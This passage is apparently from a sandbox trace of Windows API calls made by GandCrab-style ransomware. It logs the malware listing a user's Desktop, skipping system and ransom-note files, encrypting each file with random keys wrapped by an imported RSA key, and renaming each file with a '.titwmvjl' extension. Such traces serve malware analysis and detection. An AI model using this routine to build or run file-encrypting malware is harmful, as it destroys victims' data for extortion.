\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0087.238] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0087.239] CloseHandle (hObject=0x230) returned 1 [0087.239] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.239] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.239] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x20, wMilliseconds=0x22d)) [0087.239] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.240] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0087.240] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0087.240] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a09d2ca4deb61a.lock") returned 54 [0087.240] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0087.240] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.240] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.241] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\") returned 30 [0087.241] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\*" [0087.241] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5034f8 [0087.241] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0087.241] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.241] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0087.242] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0087.242] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.242] lstrcmpW (lpString1="0U1FYet.mp3", lpString2=".") returned 1 [0087.242] lstrcmpW (lpString1="0U1FYet.mp3", lpString2="..") returned 1 [0087.242] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="0U1FYet.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3" [0087.242] lstrlenW (lpString=".titwmvjl") returned 9 [0087.242] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3") returned 41 [0087.242] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.242] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3.titwmvjl") returned 50 [0087.242] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3") returned 41 [0087.242] lstrlenW (lpString=".mp3") returned 4 [0087.242] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.242] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0087.242] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0087.242] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.242] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3") returned 41 [0087.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3") returned 41 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="desktop.ini") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="autorun.inf") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="ntuser.dat") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="iconcache.db") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="bootsect.bak") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="boot.ini") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="ntuser.dat.log") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="thumbs.db") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="CRAB-DECRYPT.html") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="ntldr") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="NTDETECT.COM") returned -1 [0087.243] lstrcmpiW (lpString1="0U1FYet.mp3", lpString2="Bootfont.bin") returned -1 [0087.243] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3") returned 41 [0087.243] lstrlenW (lpString=".mp3") returned 4 [0087.243] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.243] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0087.243] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.243] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.244] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\0u1fyet.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.244] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.244] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.245] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.245] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.245] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.246] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.247] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.247] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.247] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.247] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.247] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.247] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.247] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.248] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.249] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.249] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.249] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.249] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.249] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.249] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.249] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.250] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.250] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503738) returned 1 [0087.251] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.251] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.251] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.252] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.252] GetLastError () returned 0x0 [0087.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.252] CryptDestroyKey (hKey=0x503738) returned 1 [0087.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.252] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.252] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.252] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.254] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.254] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5037f8) returned 1 [0087.254] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.254] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.254] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.254] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.254] GetLastError () returned 0x0 [0087.254] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.254] CryptDestroyKey (hKey=0x5037f8) returned 1 [0087.255] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.255] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.255] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.255] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x10366, lpOverlapped=0x0) returned 1 [0087.269] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffefc9a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.269] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10366, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x10366, lpOverlapped=0x0) returned 1 [0087.271] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.271] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.273] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.277] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.277] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.277] CloseHandle (hObject=0x2ac) returned 1 [0087.278] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\0u1fyet.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0U1FYet.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\0u1fyet.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0087.279] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.279] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0087.279] lstrcmpW (lpString1="3 e7J3Up.wav", lpString2=".") returned 1 [0087.279] lstrcmpW (lpString1="3 e7J3Up.wav", lpString2="..") returned 1 [0087.279] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="3 e7J3Up.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav" [0087.279] lstrlenW (lpString=".titwmvjl") returned 9 [0087.279] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav") returned 42 [0087.279] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0087.280] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav.titwmvjl") returned 51 [0087.280] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav") returned 42 [0087.280] lstrlenW (lpString=".wav") returned 4 [0087.280] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.280] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".wav ") returned 5 [0087.280] lstrcmpiW (lpString1=".wav", lpString2=".titwmvjl") returned 1 [0087.280] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.280] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav") returned 42 [0087.280] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav") returned 42 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="desktop.ini") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="autorun.inf") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="ntuser.dat") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="iconcache.db") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="bootsect.bak") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="boot.ini") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="ntuser.dat.log") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="thumbs.db") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="CRAB-DECRYPT.html") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="CRAB-DECRYPT.txt") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="ntldr") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="NTDETECT.COM") returned -1 [0087.280] lstrcmpiW (lpString1="3 e7J3Up.wav", lpString2="Bootfont.bin") returned -1 [0087.281] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav") returned 42 [0087.281] lstrlenW (lpString=".wav") returned 4 [0087.281] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.281] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".wav ") returned 5 [0087.281] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.281] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0087.281] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\3 e7j3up.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0087.281] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.282] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0087.282] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.282] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.283] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.284] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.284] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.284] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.284] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0087.284] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.285] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.285] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.285] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.285] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0087.286] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0087.286] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0087.286] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0087.287] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0087.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.287] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.287] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.287] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.287] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.288] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.288] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503338) returned 1 [0087.288] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.288] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.289] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.289] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.289] GetLastError () returned 0x0 [0087.289] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.289] CryptDestroyKey (hKey=0x503338) returned 1 [0087.289] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.289] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.289] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.289] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0087.290] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.291] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503378) returned 1 [0087.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.291] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0087.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.291] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0087.291] GetLastError () returned 0x0 [0087.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.291] CryptDestroyKey (hKey=0x503378) returned 1 [0087.291] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0087.291] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0087.292] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0087.292] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0087.292] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0xaf2b, lpOverlapped=0x0) returned 1 [0087.304] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff50d5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.305] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xaf2b, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0xaf2b, lpOverlapped=0x0) returned 1 [0087.306] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.306] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0087.308] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.312] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.313] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0087.313] CloseHandle (hObject=0x2ac) returned 1 [0087.321] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\3 e7J3Up.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\3 e7j3up.wav"), 